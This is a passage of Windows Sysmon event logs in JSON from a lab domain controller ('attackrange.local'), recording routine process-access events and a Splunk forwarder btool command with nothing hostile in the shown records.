C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.244","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2852,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.244\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.244","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2853,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.244\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.244","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2854,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.244\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.244","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2855,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.244\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.244","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2856,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.244\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0236-5F25-0000-0010ECFE0400}\r\nTargetProcessId: 4948\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.244","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0236-5F25-0000-0010ECFE0400}","TargetProcessId":"4948","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2857,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.248\r\nProcessGuid: {A837DB8D-0236-5F25-0000-0010ABFF0400}\r\nProcessId: 656\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: btool  web list settings --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {A837DB8D-0236-5F25-0000-0010ECFE0400}\r\nParentProcessId: 4948\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c btool web list settings --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.248","ProcessGuid":"{A837DB8D-0236-5F25-0000-0010ABFF0400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"btool  web list settings --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{A837DB8D-0236-5F25-0000-0010ECFE0400}","ParentProcessId":"4948","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c btool web list settings --no-log","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2858,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.244\r\nSourceProcessGUID: {A837DB8D-0236-5F25-0000-0010ECFE0400}\r\nSourceProcessId: 4948\r\nSourceThreadId: 4512\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {A837DB8D-0236-5F25-0000-0010ABFF0400}\r\nTargetProcessId: 656\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.244","SourceProcessGUID":"{A837DB8D-0236-5F25-0000-0010ECFE0400}","SourceProcessId":"4948","SourceThreadId":"4512","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{A837DB8D-0236-5F25-0000-0010ABFF0400}","TargetProcessId":"656","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2859,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.244\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0236-5F25-0000-0010ABFF0400}\r\nTargetProcessId: 656\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.244","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0236-5F25-0000-0010ABFF0400}","TargetProcessId":"656","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2860,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.244\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 